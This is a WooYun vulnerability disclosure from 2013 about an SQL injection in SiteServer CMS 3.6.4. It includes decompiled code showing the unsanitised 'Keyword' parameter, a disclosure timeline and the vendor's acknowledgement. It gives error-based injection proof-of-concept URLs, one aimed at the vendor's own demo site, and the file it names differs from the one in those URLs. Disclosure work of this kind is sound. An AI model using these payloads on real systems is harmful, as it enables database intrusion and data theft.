当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044055

漏洞标题:siteserver最新版3.6.4 sql inject 第九蛋

相关厂商:百容千域软件技术开发有限责任公司

漏洞作者: 小新

提交时间:2013-11-25 23:11

修复时间:2014-02-23 23:11

公开时间:2014-02-23 23:11

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-25: 细节已通知厂商并且等待厂商处理中
2013-11-26: 厂商已经确认,细节仅向厂商公开
2013-11-29: 细节向第三方安全合作伙伴开放
2014-01-20: 细节向核心白帽子及相关领域专家公开
2014-01-30: 细节向普通白帽子公开
2014-02-09: 细节向实习白帽子公开
2014-02-23: 细节向公众公开

简要描述:

siteserver 最新版3.6.4 存在注入, 第11个注入

详细说明:

第11个注入存在/UserCenter/cms/contents.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

Label_08D1:
this.spContents.SelectCommand = UserDataProvider.UserDAO.GetSelectCommand(base.Request.QueryString["Keyword"], TranslateUtils.ToInt(base.Request.QueryString["CreateDate"]), TranslateUtils.ToInt(base.Request.QueryString["LastActivityDate"]), true, TranslateUtils.ToInt(base.Request.QueryString["TypeID"]), TranslateUtils.ToInt(base.Request.QueryString["DepartmentID"]), TranslateUtils.ToInt(base.Request.QueryString["AreaID"]));
this.rptContents.ItemDataBound += new RepeaterItemEventHandler(this.x189b5ecd83f1b098);
this.spContents.SortField = UserDataProvider.UserDAO.GetSortFieldName();
this.spContents.SortMode = SortMode.DESC;
UserGroupInfo groupInfoByCredits = UserGroupManager.GetGroupInfoByCredits(0);


Keyword 很明显的注入

漏洞证明:

http://www.target.com/siteserver/cms/console_user.aspx?PageNum=0&Keyword=1'%20and%201=@@version%20and%201='1&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0


2013-11-25-222108_724x330_scrot.png


官网:

http://2012.moban.siteserver.cn/siteserver/cms/console_user.aspx?PageNum=0&Keyword=1'%20and%201=@@version%20and%201='1&CreateDate=0&LastActivityDate=0&TypeID=0&DepartmentID=0&AreaID=0

修复方案:

对keyword进行过滤
小哥,rank

版权声明:转载请注明来源 小新@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-11-26 11:38

厂商回复:

感谢提醒,我们将尽快修复

最新状态:

暂无